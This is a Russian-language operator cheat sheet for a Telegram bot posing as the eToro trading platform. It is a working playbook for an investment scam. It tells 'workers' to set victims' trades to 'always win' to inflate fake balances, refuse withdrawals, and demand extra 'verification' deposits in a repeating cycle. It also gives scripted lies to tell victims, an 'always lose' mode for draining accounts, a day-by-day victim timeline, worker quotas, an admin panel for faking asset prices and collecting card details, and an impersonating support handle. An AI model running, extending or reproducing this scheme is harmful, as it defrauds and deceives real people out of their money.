═══════════════════════════════════════════════════════════
📋 БЫСТРАЯ ШПАРГАЛКА - eToro Trading Bot
═══════════════════════════════════════════════════════════

🔧 ДЛЯ ВОРКЕРА
═══════════════════════════════════════════════════════════

📌 КОМАНДЫ:
/worker - Открыть панель воркера

📌 ГЛАВНАЯ ЦЕЛЬ:
Разогнать баланс мамонта с 1,000₽ до 100,000₽+

📌 АЛГОРИТМ РАБОТЫ:
1. Создать промокод (500-1000₽)
2. Привлечь клиента
3. Подтвердить первое пополнение
4. Режим: ✅ Всегда победа
5. Процент роста: 2.5-4%
6. Разогнать баланс до 50,000-150,000₽
7. Отклонить вывод
8. Попросить довнести для "верификации"
9. Повторить цикл

📌 НАСТРОЙКИ ДЛЯ РАЗГОНА:
• Режим: ✅ Всегда победа
• Процент: 3-4% (оптимально)
• Плечо: Мотивировать на x5-x10
• Время: Любое

📌 ФОРМУЛА ПРИБЫЛИ:
Прибыль = Ставка × Плечо × Процент_роста

Пример:
10,000₽ × 5 × 0.03 = 1,500₽ прибыли

📌 РЕЖИМЫ ТОРГОВЛИ:
🎲 Случайный - 50/50 (для реалистичности)
✅ Всегда победа - ВСЕГДА выигрыш (для разгона!)
❌ Всегда поражение - ВСЕГДА проигрыш (для слива)

📌 ПРОЦЕНТЫ РОСТА:
1.0% = медленно 🐌
2.5% = норма 🚶
4.0% = быстро 🚀
5.0%+ = подозрительно ⚠️

📌 ФРАЗЫ ДЛЯ КЛИЕНТА:
✅ "Поздравляю с прибылью!"
✅ "Используйте плечо x10 для быстрого роста"
✅ "Для вывода нужна верификация, довнесите 10,000₽"
✅ "Технический сбой, попробуйте завтра"

═══════════════════════════════════════════════════════════

👤 ДЛЯ ПОЛЬЗОВАТЕЛЯ
═══════════════════════════════════════════════════════════

📌 КОМАНДЫ:
/start - Начать
/profile - Профиль
/trade - Торговать
/help - Помощь

📌 ПОПОЛНЕНИЕ:
Минимум: 100₽
Способы: Карта или Крипта
Время: 5-15 минут

📌 ТОРГОВЛЯ:
1. /trade
2. Выбрать актив
3. Выбрать направление (⬆️ или ⬇️)
4. Выбрать время (30с, 1м, 5м)
5. Ввести сумму
6. Выбрать плечо (x1, x2, x5, x10)
7. Создать сделку

📌 ПЛЕЧО (LEVERAGE):
x1 = обычная прибыль
x2 = прибыль × 2
x5 = прибыль × 5 🔥
x10 = прибыль × 10 💎
x25 = прибыль × 25 🚀
x50 = прибыль × 50 ⚡

📌 ПРИМЕР РАСЧЕТА:
Ставка: 1,000₽
Плечо: x5
Рост: 2%
Прибыль: 1,000 × 5 × 0.02 = 100₽

📌 ВЫВОД:
Минимум: 1,000₽
Формат:
5000
2200 1234 5678 9012

⚠️ Только на те же реквизиты, что при пополнении!

📌 СОВЕТЫ:
✅ Начинайте с малого (100-500₽)
✅ Используйте x1-x2 для начала
✅ Изучите 2-3 актива
✅ Фиксируйте прибыль
❌ Не ставьте все деньги
❌ Не используйте x50 сразу
❌ Не торгуйте на эмоциях

═══════════════════════════════════════════════════════════

🔐 ДЛЯ АДМИНИСТРАТОРА
═══════════════════════════════════════════════════════════

📌 КОМАНДЫ:
/worker1236 - Админ-панель

📌 ФУНКЦИИ:
👥 Все пользователи - Список всех
💳 Реквизиты - Настройка реквизитов
📊 Промокоды - Управление промокодами
💳 Управление картами - Разрешенные карты для вывода
💹 Обновить цены - Изменить цены активов
📢 Рассылка всем - Отправить сообщение всем

📌 ОБНОВЛЕНИЕ ЦЕН:
Формат JSON:
{
    "# Криптовалюты (в рублях)": {
        "₿ Bitcoin (BTC)": 8988312.00,
        "Ξ Ethereum (ETH)": 318839.00
    },
    "# Российские акции (в рублях)": {
        "🛢️ Газпром (GAZP)": 137.54
    },
    "# Сырьевые товары (в рублях)": {
        "🥇 Золото (GOLD)": 10787.00
    }
}

═══════════════════════════════════════════════════════════

📊 СТАТИСТИКА И ЦЕЛИ
═══════════════════════════════════════════════════════════

📌 ЦЕЛЕВЫЕ ПОКАЗАТЕЛИ ВОРКЕРА:
Хороший:
• 5-10 активных клиентов
• Средний депозит: 10,000-50,000₽
• 2-3 повторных пополнения

Отличный:
• 10-20 активных клиентов
• Средний депозит: 50,000-200,000₽
• 5+ повторных пополнений

📌 ПУТЬ КЛИЕНТА:
День 1: Промокод 500₽
День 2: Пополнение 1,000₽ → Баланс 1,500₽
День 3-7: Разгон до 50,000₽
День 8: Попытка вывода → Отклонено
День 9: Довнос 10,000₽ → Баланс 60,000₽
День 10-14: Разгон до 100,000₽+

═══════════════════════════════════════════════════════════

⚡ ГОРЯЧИЕ КЛАВИШИ
═══════════════════════════════════════════════════════════

ВОРКЕР:
/worker → 👥 → Выбрать клиента → 🎲 → ✅ Всегда победа
/worker → 👥 → Выбрать клиента → 📈 → 3.0%

ПОЛЬЗОВАТЕЛЬ:
/trade → 💎 → ₿ Bitcoin → ⬆️ → 1м → 1000 → x5 → ✅

АДМИН:
/worker1236 → 💹 → Вставить JSON

═══════════════════════════════════════════════════════════

📞 ПОДДЕРЖКА: @eToroSupport_Official

═══════════════════════════════════════════════════════════
